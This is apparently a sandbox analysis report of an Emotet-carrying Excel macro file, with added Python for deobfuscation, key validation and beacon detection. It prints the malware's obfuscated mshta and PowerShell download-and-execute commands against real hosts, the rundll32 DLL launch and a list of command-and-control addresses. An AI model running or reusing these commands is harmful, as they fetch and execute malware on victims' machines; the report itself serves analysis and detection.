Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 13:00

General

  • Target

    92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm

  • Size

    115KB

  • MD5

    12f7a6aa0a09e355bd70c8291ae682e2

  • SHA1

    ea7943806f839e871bb5c957d64850ca66118577

  • SHA256

    92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a

  • SHA512

    df6ee800f9bf4b2e9a60b8a371031410416992b4b1806900fdfc4d399e5c5cdf5efc53d62ce3f8549bdbe3e88e20f4c4cf6662d8b826d4c0cb082a53d0afb2a4

Malware Config

Extracted

Language: hta
Source:
    mshta http://0x5cff39c3/sec/se1.html
URLs (hta.dropper):
    http://0x5cff39c3/sec/se1.html

The host 0x5cff39c3 is a hexadecimal IPv4 literal (0x5c.0xff.0x39.0xc3 = 92.255.57.195), the same server that serves the PowerShell stage; the captured request below shows mshta.exe sending Host: 92.255.57.195, so the client normalized the address before connecting. An indicator match on the dotted form alone misses this notation.
Extracted

Language: ps1
Deobfuscated:

    # powershell snippet 0
    $c1 = "(New-Object Net.We"
    $c4 = "bClient).Downlo"
    $c3 = "adString('http://92.255.57.195/sec/se1.png')"
    $ji = "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"
    invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"|invoke-expression

    # powershell snippet 1
    (new-object net.webclient).downloadstring("http://92.255.57.195/sec/se1.png")

URLs (ps1.dropper):
    http://92.255.57.195/sec/se1.png

se1.png is served as Content-Type: image/png with a 1072-byte body (see the network capture below), but the result of DownloadString is piped straight into Invoke-Expression, so the "image" is PowerShell script text. The requests powershell.exe makes next, GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/ (404) and GET http://quranthemepark.com/wp-content/OaIz2gBtm/ (200, a 573440-byte application/x-msdownload attachment named Mnn5aTw4cbQfa.dll), match a downloader that walks a list of payload URLs until one answers; the process tree then shows powershell.exe launching the DLL via rundll32 as C:\Users\Public\Documents\ssd.dll.
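
The hta and ps1 configs above are what is left after undoing three layers of obfuscation that are visible in this report's process tree: cmd.exe caret escapes (m^sh^t^a), the hexadecimal host 0x5cff39c3, and PowerShell's junk-token .replace('{GOOGLE}', ''), -Join and I`E`X tricks. The Python below is an added example, not part of the sandbox report or of Emotet's own code; it reproduces that deobfuscation offline on copies of the two command lines from the tree. The IPv4-literal expansion goes beyond this sample and handles every form inet_aton accepts (hexadecimal, octal, decimal, and one to four dotted parts), since the same downloader template is seen with all of them.

```python
import re

# Copies of the two obfuscated command lines from this report's process tree.
CMD_LINE = r"cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html"
PS_LINE = (
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noexit "
    "$c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t "
    "N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); "
    "$c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}"
    "nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); "
    "$c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://"
    "92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');"
    "$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)


def strip_cmd_carets(cmd: str) -> str:
    """cmd.exe treats ^ as an escape character (^x is x), so m^sh^t^a runs mshta."""
    return re.sub(r"\^(.)", r"\1", cmd)


def _inet_part(tok: str) -> int:
    t = tok.lower()
    if t.startswith("0x"):
        return int(t[2:], 16)
    if len(t) > 1 and t[0] == "0":
        return int(t, 8)
    return int(t, 10)


def normalize_ipv4_literal(host: str) -> str:
    """Expand an inet_aton-style literal (hex, octal, decimal; 1 to 4 dotted parts) to dotted decimal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(host)
    widths = [8] * (len(parts) - 1) + [8 * (5 - len(parts))]  # the last part fills the remaining bits
    n = 0
    for tok, width in zip(parts, widths):
        value = _inet_part(tok)
        if not 0 <= value < (1 << width):
            raise ValueError(host)
        n = (n << width) | value
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


URL_RE = re.compile(r"(https?://)([^/\s'\"()]+)(/[^\s'\"()]*)?", re.I)


def normalize_urls(text: str) -> list:
    """Pull URLs out of text and rewrite any numeric-literal host into dotted decimal."""
    urls = []
    for scheme, hostport, path in URL_RE.findall(text):
        host, sep, port = hostport.partition(":")
        try:
            host = normalize_ipv4_literal(host)
        except ValueError:
            pass  # an ordinary hostname, or an address that is already dotted decimal
        urls.append(scheme.lower() + host + sep + port + path)
    return urls


ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'\.replace\('([^']*)',\s*''\)", re.I)
JOIN_RE = re.compile(r"\$(\w+)=\(((?:\$\w+,?)+)\s+-Join\s+''\)", re.I)


def deobfuscate_powershell(cmd: str) -> dict:
    """Resolve junk-token string assignments, -Join concatenation and backtick-split IEX."""
    variables = {}
    for name, literal, junk in ASSIGN_RE.findall(cmd):
        # '' inside a single-quoted PowerShell string is one literal quote; then the junk token goes.
        variables[name.lower()] = literal.replace("''", "'").replace(junk, "")
    for name, members in JOIN_RE.findall(cmd):
        variables[name.lower()] = "".join(variables[m.lower()] for m in re.findall(r"\$(\w+)", members))
    final = re.sub(r"`(.)", r"\1", cmd.rsplit(";", 1)[-1])  # backtick is PowerShell's escape character
    for name, value in variables.items():
        final = re.sub(r"\$" + re.escape(name) + r"\b", lambda m, v=value: v, final, flags=re.I)
    return {"variables": variables, "final": final}


def analyze_chain(cmd_line: str = CMD_LINE, ps_line: str = PS_LINE) -> dict:
    stage1 = normalize_urls(strip_cmd_carets(cmd_line))
    ps = deobfuscate_powershell(ps_line)
    return {"stage1_urls": stage1, "stage2_urls": normalize_urls(ps["final"]), "powershell": ps["final"]}


if __name__ == "__main__":
    print(analyze_chain())
```

The order of operations matters: PowerShell parses the single-quoted literal (turning '' into ') before .replace runs, so the token must be removed from the unescaped string, and the -Join list must be resolved in the order the variables are listed, not the order they were assigned.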

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain (ECK1: Emotet's ECDH public key, used to derive the key that encrypts C2 traffic)
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
-----END PUBLIC KEY-----
ecs1.plain (ECS1: Emotet's ECDSA public key, used to verify signed C2 responses)
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
-----END PUBLIC KEY-----

Both blobs are SubjectPublicKeyInfo structures for prime256v1 (NIST P-256): the shared base64 prefix MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE decodes to the id-ecPublicKey and prime256v1 OIDs followed by the 0x04 marker of an uncompressed point. Emotet embeds these keys per botnet epoch rather than per sample, so they are a more stable pivot than the C2 list above, which rotates frequently.
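
Before pasting the two PEM blocks into a traffic decryptor it is worth checking that they survived extraction intact: a single wrong base64 character still decodes to 91 bytes with a plausible DER header, but yields a point that is not on the curve. The Python below is an added example (not part of the sandbox report or of any Emotet tooling) that parses the SubjectPublicKeyInfo by hand with the standard library only and tests the point against the P-256 equation; the curve constants are the NIST values, and the page's two keys are the inputs.

```python
import base64
import hashlib

# NIST P-256 (prime256v1): y^2 = x^3 - 3x + b over GF(p); (GX, GY) is the standard base point.
P256_P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
P256_B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
P256_GX = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
P256_GY = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5

# DER header of a SubjectPublicKeyInfo for id-ecPublicKey (1.2.840.10045.2.1) on
# prime256v1 (1.2.840.10045.3.1.7) carrying an uncompressed point:
#   SEQUENCE(89) { SEQUENCE(19) { OID, OID }  BIT STRING(66) { 00 unused bits, 04 || X || Y } }
SPKI_P256_HEADER = bytes.fromhex("3059301306072a8648ce3d020106082a8648ce3d030107034200")

# The two PEM blocks from this report's extracted config (ECK1 and ECS1).
EMOTET_ECK1 = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
-----END PUBLIC KEY-----"""
EMOTET_ECS1 = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
-----END PUBLIC KEY-----"""


def pem_to_der(pem: str) -> bytes:
    body = "".join(line.strip() for line in pem.strip().splitlines() if not line.startswith("-----"))
    return base64.b64decode(body, validate=True)


def is_on_p256(x: int, y: int) -> bool:
    """True when (x, y) satisfies the curve equation; a transcription error fails this check."""
    if not (0 <= x < P256_P and 0 <= y < P256_P):
        return False
    return (y * y - (x * x * x - 3 * x + P256_B)) % P256_P == 0


def parse_p256_spki(pem: str) -> dict:
    der = pem_to_der(pem)
    if len(der) != 91 or not der.startswith(SPKI_P256_HEADER) or der[26] != 0x04:
        raise ValueError("not an uncompressed prime256v1 SubjectPublicKeyInfo")
    x = int.from_bytes(der[27:59], "big")
    y = int.from_bytes(der[59:91], "big")
    return {
        "curve": "prime256v1",
        "x": x,
        "y": y,
        "on_curve": is_on_p256(x, y),
        "spki_sha256": hashlib.sha256(der).hexdigest(),  # a stable pivot for this botnet epoch
    }


if __name__ == "__main__":
    for label, pem in (("ECK1", EMOTET_ECK1), ("ECS1", EMOTET_ECS1)):
        info = parse_p256_spki(pem)
        print(label, info["curve"], "on_curve=%s" % info["on_curve"], info["spki_sha256"][:16])
```

A False in on_curve means the key as transcribed is unusable even though the DER framing looks right. The SPKI hash is the value to key a detection or a sample-clustering rule on: Emotet changes its C2 list far more often than its keys.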

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's stock description labels this likely ransomware behaviour; the family here is Emotet, a loader, so treat the heuristic as generic drive enumeration and not as evidence of encryption activity.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\92f01f34d0d3d902538fa84268d937ddcbfb4e40234b4a97b1b50a227a002f1a.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1492
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1544
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1740
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1168
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",jkYS
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1696
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wagne\xhjatsq.oce",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1952

    Network

    • GET  (server geolocated: RU)
      http://92.255.57.195/sec/se1.html
      mshta.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.html HTTP/1.1
      Accept: */*
      Accept-Language: en-US
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:33 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
      ETag: "2adf-5d5f38fbf4740"
      Accept-Ranges: bytes
      Content-Length: 10975
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
    • GET  (server geolocated: RU)
      http://92.255.57.195/sec/se1.png
      powershell.exe
      Remote address:
      92.255.57.195:80
      Request
      GET /sec/se1.png HTTP/1.1
      Host: 92.255.57.195
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:40 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
      ETag: "430-5d5f3895e9680"
      Accept-Ranges: bytes
      Content-Length: 1072
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • DNS  (resolver geolocated: US)
      seven-lines.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      seven-lines.com
      IN A
      Response
      seven-lines.com
      IN A
      178.208.83.22
    • DNS  (resolver geolocated: US)
      seven-lines.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      seven-lines.com
      IN A
      Response
      seven-lines.com
      IN A
      178.208.83.22
    • GET  (server geolocated: NL)
      http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      powershell.exe
      Remote address:
      178.208.83.22:80
      Request
      GET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
      Host: seven-lines.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Thu, 20 Jan 2022 13:00:41 GMT
      Content-Type: text/html
      Content-Length: 1390
      Connection: keep-alive
      Keep-Alive: timeout=5
      Vary: Accept-Encoding
      ETag: "5a4b7cd2-56e"
    • DNS  (resolver geolocated: US)
      quranthemepark.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      quranthemepark.com
      IN A
      Response
      quranthemepark.com
      IN A
      104.21.59.15
      quranthemepark.com
      IN A
      172.67.167.147
    • GET  (server geolocated: US)
      http://quranthemepark.com/wp-content/OaIz2gBtm/
      powershell.exe
      Remote address:
      104.21.59.15:80
      Request
      GET /wp-content/OaIz2gBtm/ HTTP/1.1
      Host: quranthemepark.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 20 Jan 2022 13:00:42 GMT
      Content-Type: application/x-msdownload
      Content-Length: 573440
      Connection: keep-alive
      x-powered-by: PHP/7.4.26
      set-cookie: 61e95cfa6871d=1642683642; expires=Thu, 20-Jan-2022 13:01:42 GMT; Max-Age=60; path=/
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      last-modified: Thu, 20 Jan 2022 13:00:42 GMT
      expires: Thu, 20 Jan 2022 13:00:42 GMT
      content-disposition: attachment; filename="Mnn5aTw4cbQfa.dll"
      content-transfer-encoding: binary
      x-turbo-charged-by: LiteSpeed
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f9paFLKTegeP5IDk2NxxNSU15mFgeI%2BSkYNERxLmZWMhC3sklK8E8%2FrgJ5hTqbw0MCTSvhDVR11FTDqfwtHaK3FUQyrwQok6i0ErQn1BpvRmqZyUoBrCCpnAsBCX6EweaEiHOCU%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6d087cbcfe261ed6-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • GET  (server geolocated: US)
      https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
      rundll32.exe
      Remote address:
      69.16.218.101:8080
      Request
      GET /LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN HTTP/1.1
      Cookie: YiLPOtLipOUi=69ndAlY7nJX7O7X28fOPnpLakAWbOBrRvH9Fxu1XphOKCEJhfpCFBMAjStZIqQEYEV1DNK+VsVSFwB9+PPMrGgd0jpNpAVDnW9+ntx0R9iZARURcfcsgdNPVA9eH1vILlrOUSKzlQt9ziLvdxNN7E+4Q/wyb5/F7f4K9GPRCD5koPhSIzxpYL7srrUqaMNgNiTWesm8XdLaMZ1J/LzDz+gK9BQzPow7y0ZaOADzQEfecUvz+DTLUdxgLUtaz3kXtMWK8Tk1UqCg/w4GVgnL7j1oD1JGZNP/7jKNOP2NmKNxxNzI=
      Host: 69.16.218.101:8080
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 20 Jan 2022 13:00:59 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    Traffic summary (destination; URL or name; protocol; process; bytes sent / received; packets sent / received):

    • 92.255.57.195:80  http://92.255.57.195/sec/se1.html  (http, mshta.exe)
      716 B / 11.7kB, 8 / 10 packets
      HTTP Request: GET http://92.255.57.195/sec/se1.html
      HTTP Response: 200
    • 92.255.57.195:80  http://92.255.57.195/sec/se1.png  (http, powershell.exe)
      678 B / 3.0kB, 13 / 5 packets
      HTTP Request: GET http://92.255.57.195/sec/se1.png
      HTTP Response: 200
    • 178.208.83.22:80  http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/  (http, powershell.exe)
      643 B / 1.8kB, 12 / 5 packets
      HTTP Request: GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
      HTTP Response: 404
    • 104.21.59.15:80  http://quranthemepark.com/wp-content/OaIz2gBtm/  (http, powershell.exe)
      9.8kB / 591.0kB, 211 / 414 packets
      HTTP Request: GET http://quranthemepark.com/wp-content/OaIz2gBtm/
      HTTP Response: 200
    • 45.138.98.34:80  (rundll32.exe)
      152 B / 120 B, 3 / 3 packets; no HTTP request recorded (the original summary lists this connection twice with identical figures)
    • 69.16.218.101:8080  https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN  (tls, http; rundll32.exe)
      1.2kB / 3.0kB, 8 / 9 packets
      HTTP Request: GET https://69.16.218.101:8080/LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN
      HTTP Response: 200
    • 8.8.8.8:53  seven-lines.com  (dns, powershell.exe)
      122 B / 154 B, 2 / 2 packets
      DNS Request: seven-lines.com (sent twice)
      DNS Response: 178.208.83.22 (both times)
    • 8.8.8.8:53  quranthemepark.com  (dns, powershell.exe)
      64 B / 96 B, 1 / 1 packets
      DNS Request: quranthemepark.com
      DNS Response: 104.21.59.15, 172.67.167.147

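    Compare the three kinds of request in the capture above: mshta.exe's fetch of the HTA looks like Internet Explorer (full Accept and User-Agent headers), PowerShell's payload fetches are bare GETs carrying only Host and Connection, and the rundll32.exe beacon goes to a raw IP on port 8080 with no User-Agent, a randomly named cookie holding a long base64 blob, a 39-character random path and Cache-Control: no-cache. The Python below is an added example, not part of the sandbox report, that scores raw requests on those traits; the three requests are reconstructed from the capture (headers only, as the sandbox shows them) and the threshold of three indicators is a choice made for this illustration, not a published rule.

```python
import re
from ipaddress import ip_address

# Raw requests reconstructed from this report's network capture (headers only).
REQ_STAGE1 = (
    "GET /sec/se1.html HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; "
    ".NET4.0E; InfoPath.3)\r\n"
    "Host: 92.255.57.195\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
REQ_PAYLOAD = (
    "GET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1\r\n"
    "Host: seven-lines.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
REQ_C2 = (
    "GET /LHyFjvUSshgKZWdsKtuzciSGqqTgxPjUzJDwjkN HTTP/1.1\r\n"
    "Cookie: YiLPOtLipOUi=69ndAlY7nJX7O7X28fOPnpLakAWbOBrRvH9Fxu1XphOKCEJhfpCFBMAjStZIqQEYEV1DNK+VsVSFwB9+"
    "PPMrGgd0jpNpAVDnW9+ntx0R9iZARURcfcsgdNPVA9eH1vILlrOUSKzlQt9ziLvdxNN7E+4Q/wyb5/F7f4K9GPRCD5koPhSIzxpYL7srr"
    "UqaMNgNiTWesm8XdLaMZ1J/LzDz+gK9BQzPow7y0ZaOADzQEfecUvz+DTLUdxgLUtaz3kXtMWK8Tk1UqCg/w4GVgnL7j1oD1JGZNP/7jKNOP2NmKNxxNzI=\r\n"
    "Host: 69.16.218.101:8080\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

BASE64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
RANDOM_SEGMENT_RE = re.compile(r"[A-Za-z0-9]{20,}")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request head into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def c2_indicators(raw: str) -> list:
    """Beacon-like traits of one request; each is weak alone, the combination is the signal."""
    req = parse_request(raw)
    h = req["headers"]
    host, _, port = h.get("host", "").partition(":")
    hits = []
    try:
        ip_address(host)
        hits.append("bare_ip_host")           # no DNS at all: usual for Emotet C2, rare for real sites
    except ValueError:
        pass
    if port and port != "80":
        hits.append("nonstandard_port")       # plain HTTP on 8080/443/7080 is typical of the family
    if "user-agent" not in h:
        hits.append("no_user_agent")          # browsers and WinINet clients always send one
    name, _, value = h.get("cookie", "").partition("=")
    if re.fullmatch(r"[A-Za-z]{6,}", name) and BASE64_RE.fullmatch(value):
        hits.append("base64_blob_in_cookie")  # encrypted request data smuggled in a random-named cookie
    segments = [s for s in req["target"].split("/") if s]
    if segments and RANDOM_SEGMENT_RE.fullmatch(segments[-1]):
        hits.append("long_random_path")
    if h.get("cache-control", "").lower() == "no-cache" and "cookie" in h:
        hits.append("no_cache_with_cookie")
    return hits


def is_beacon_like(raw: str, threshold: int = 3) -> bool:
    return len(c2_indicators(raw)) >= threshold


if __name__ == "__main__":
    for label, raw in (("stage1", REQ_STAGE1), ("payload", REQ_PAYLOAD), ("c2", REQ_C2)):
        print(label, is_beacon_like(raw), c2_indicators(raw))
```

The payload fetch and the HTA fetch each trip exactly one indicator (a missing User-Agent and a bare-IP host respectively), which is why a single-trait rule fires on ordinary scripted downloads all day; the beacon trips all six. In production the same scoring belongs in a proxy log or Zeek http.log pipeline rather than on raw request text, but the traits are the same fields.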

    Downloads (memory dumps; name is process PID, dump index, and address range)

    • memory/1108-57-0x0000000075431000-0x0000000075433000-memory.dmp (8KB)
    • memory/1108-54-0x000000002FB81000-0x000000002FB84000-memory.dmp (12KB)
    • memory/1108-56-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
    • memory/1108-55-0x0000000071461000-0x0000000071463000-memory.dmp (8KB)
    • memory/1168-75-0x0000000000350000-0x0000000000378000-memory.dmp (160KB)
    • memory/1168-77-0x0000000000D80000-0x0000000000DA8000-memory.dmp (160KB)
    • memory/1168-79-0x0000000002350000-0x0000000002378000-memory.dmp (160KB)
    • memory/1168-81-0x0000000002460000-0x0000000002488000-memory.dmp (160KB)
    • memory/1168-83-0x0000000002670000-0x0000000002698000-memory.dmp (160KB)
    • memory/1168-85-0x00000000027C0000-0x00000000027E8000-memory.dmp (160KB)
    • memory/1168-88-0x0000000002860000-0x0000000002888000-memory.dmp (160KB)
    • memory/1492-58-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp (8KB)
    • memory/1696-89-0x0000000000290000-0x00000000002B8000-memory.dmp (160KB)
    • memory/1740-68-0x00000000001A0000-0x00000000001C8000-memory.dmp (160KB)
    • memory/1744-61-0x0000000002560000-0x00000000031AA000-memory.dmp (12.3MB)
    • memory/1952-93-0x00000000001F0000-0x0000000000218000-memory.dmp (160KB)
    • memory/1952-95-0x00000000002A0000-0x00000000002C8000-memory.dmp (160KB)
    • memory/1952-97-0x00000000009A0000-0x00000000009C8000-memory.dmp (160KB)
    • memory/1952-99-0x0000000000BB0000-0x0000000000BD8000-memory.dmp (160KB)
    • memory/1952-101-0x0000000002540000-0x0000000002568000-memory.dmp (160KB)
    • memory/1952-103-0x0000000002690000-0x00000000026B8000-memory.dmp (160KB)
    • memory/1952-105-0x00000000027D0000-0x00000000027F8000-memory.dmp (160KB)
    • memory/1952-107-0x0000000002870000-0x0000000002898000-memory.dmp (160KB)
